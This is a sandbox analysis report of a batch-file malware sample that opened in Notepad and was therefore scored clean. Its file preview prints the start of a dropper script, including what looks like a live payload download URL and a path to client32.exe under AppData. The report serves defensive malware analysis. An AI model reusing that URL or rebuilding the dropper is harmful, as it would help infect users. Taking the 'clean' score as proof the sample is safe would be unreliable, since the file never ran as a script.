Edit tour

Windows Analysis Report
batch file malware.bat.txt

Overview

General Information

Sample name:batch file malware.bat.txt
Analysis ID:1669042
MD5:6ec79021ae9c27ded0f52866130ba850
SHA1:9b7496149c503057dba40c2f659da70291f1397d
SHA256:bfdafe2875fe11bb2b5b36549310f7f96bc4d44a2821c06b030088fee2e64818

Detection

Score:0
Range:0 - 100
Confidence:80%

Signatures

Queries the volume information (name, serial number etc) of a device

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • notepad.exe (PID: 7624 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\batch file malware.bat.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: notepad.exe, 00000000.00000002.2413137464.0000026469A96000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000000.00000002.2413137464.0000026469ABB000.00000004.00000020.00020000.00000000.sdmp, batch file malware.bat.txtString found in binary or memory: https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c
Source: classification engineClassification label: clean0.winTXT@1/0@0/0
Source: C:\Windows\System32\notepad.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\batch file malware.bat.txt VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping11
System Information Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1669042 Sample: batch file malware.bat.txt Startdate: 19/04/2025 Architecture: WINDOWS Score: 0 4 notepad.exe 2->4         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cnotepad.exe, 00000000.00000002.2413137464.0000026469A96000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000000.00000002.2413137464.0000026469ABB000.00000004.00000020.00020000.00000000.sdmp, batch file malware.bat.txtfalse
  • Avira URL Cloud: safe
unknown
No contacted IP infos
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1669042
Start date and time:2025-04-19 06:04:53 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:batch file malware.bat.txt
Detection:CLEAN
Classification:clean0.winTXT@1/0@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .txt
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 184.28.213.193, 20.109.210.53
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
No simulations
No context
No context
No context
No context
No context
No created / dropped files found
File type:DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):5.550147012633201
TrID:
    File name:batch file malware.bat.txt
    File size:706 bytes
    MD5:6ec79021ae9c27ded0f52866130ba850
    SHA1:9b7496149c503057dba40c2f659da70291f1397d
    SHA256:bfdafe2875fe11bb2b5b36549310f7f96bc4d44a2821c06b030088fee2e64818
    SHA512:e407f16b68fc69855273f96151154d5acaf45bf680b758a108272a51d037f9b1815c4af65498783cc03e7370c5e1ba7823e61351768d11b72dfe11f2f22d2a38
    SSDEEP:12:wbYVJXJNFAOwAwxbQClfnugXFSu/BNCu/62T981kv1Sf/BCGJjf+2Yjf0fV8Vj0A:wqXvFAOwPbduS1KOvYhCiWljst8VcnIj
    TLSH:4001C042521D747DE9F803D4990C1AC75A8DC3DA661B86E9F12A40B84A5D2BB84CB2A4
    File Content Preview:@echo off..setlocal enabledelayedexpansion....set "LCVCGBKO=https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c"..set "MBHRSHD=%APPDATA%\MyApp23"..set "CZAHPKO=%APPDATA%\count.zip"..set "LYMINHSKU=!MBHRSHD!\client32.exe"....if not exist "!MBHRSH
    Icon Hash:72eaa2aaa2a2a292
    No network behavior found
    050100s020406080100

    Click to jump to process

    050100s0.005101520MB

    Click to jump to process

    • File
    • Registry

    Click to dive into process behavior distribution

    Target ID:0
    Start time:00:05:47
    Start date:19/04/2025
    Path:C:\Windows\System32\notepad.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\batch file malware.bat.txt
    Imagebase:0x7ff7d6920000
    File size:201'216 bytes
    MD5 hash:27F71B12CB585541885A31BE22F61C83
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    No disassembly